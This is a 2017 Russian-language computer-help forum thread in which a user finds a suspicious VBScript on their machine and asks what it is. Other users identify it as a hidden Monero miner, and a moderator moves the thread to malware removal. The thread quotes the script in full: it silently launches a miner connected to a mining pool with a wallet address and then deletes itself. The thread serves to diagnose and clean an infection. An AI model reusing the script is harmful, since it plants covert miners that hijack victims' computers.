Непонятная ошибка... - Компьютерный форум OSzone.net

Компьютерный форум OSzone.net (http://forum.oszone.net/index.php)

- Лечение систем от вредоносных программ (http://forum.oszone.net/forumdisplay.php?f=87)

- - Непонятная ошибка... (http://forum.oszone.net/showthread.php?t=325989)

SVG	16-04-2017 07:08 2729711

Непонятная ошибка...

Вложений: 2

Снимок.PNG (14.20 KB, скачиваний: 46)
Снимок2.PNG (12.40 KB, скачиваний: 43)

Всем привет!!!
Сегодня вдруг вылезло... см. Снимок...
файлы в папке... см. Снимок2..

trats.vbs...

Dim oShell
Set oShell = WScript.CreateObject ("WSCript.shell")
oShell.run ("wsrss.exe -q -o stratum+tcp://xmr-eu.dwarfpool.com:8005 -u 47sghzufGhJJDQEbScMCwVBimTuq6L5JiRixD8VeGbpjCTA12noXmi4ZyBZLc99e66NtnKff34fHsGRoyZk3ES1s1V4QVcB.b7a6 607ff26d5a40bc50e95784097722bfd4182f6116c5a5ec0878f8611d8fac.ZW_03 -p x"), 0
Set oShell = Nothing
WScript.Sleep 100
Set mFSO = CreateObject("Scripting.FileSystemObject")
Call mFSO.DeleteFile(WScript.ScriptFullName, True)

хочется понять что это, т.к. на двух других осях этой папки в соответствующем месте нет...

NickM

16-04-2017 09:28 2729728

Цитата:

Цитата SVG

oShell.run ("wsrss.exe »

что за файл и где он лежит?

Казбек

16-04-2017 10:00 2729733

Цитата:

Цитата SVG

xmr-eu.dwarfpool.com:8005 »

Monero

SVG	16-04-2017 10:33 2729739

NickM, нет такого файла... видимо и ошибка из-за этого...
Казбек, а по русски если мона...

NickM

16-04-2017 11:10 2729744

Цитата:

Цитата SVG

Казбек, а по русски если мона... »

Полагаю человек говорит - кто-то скрытно майнить собрался/собирался/майнил.

Nordek

16-04-2017 11:21 2729745

SVG, Google см. ссылку: [XMR][ETH][EXP][GRS] Стабильный DwarfPool. - Bits.media.

SVG	16-04-2017 12:06 2729753

Цитата:

Цитата NickM

Полагаю человек говорит - кто-то скрытно майнить собрался/собирался/майнил. »

примерно о том же и подумал от Казбека... но, комп мой и доступа к нему посторонних нет.... однозначно.... и подобным не занимаюсь...

Vadikan

16-04-2017 12:22 2729755

Переношу в лечение, делайте логи http://forum.oszone.net/thread-98169.html

SVG	16-04-2017 13:19 2729769

Проверил последним (...2349...) SEPом из-под другой оси и... wsvc.exe...
http://securityresponse.symantec.com...3-99&vid=55865
где "подцепил" - ума не преложу.... KIS 17 молчал как рыба...

Sandor

17-04-2017 19:51 2730170

SVG, здравствуйте! Соберите и прикрепите CollectionLog по выше указанной ссылке.

Время: 22:43.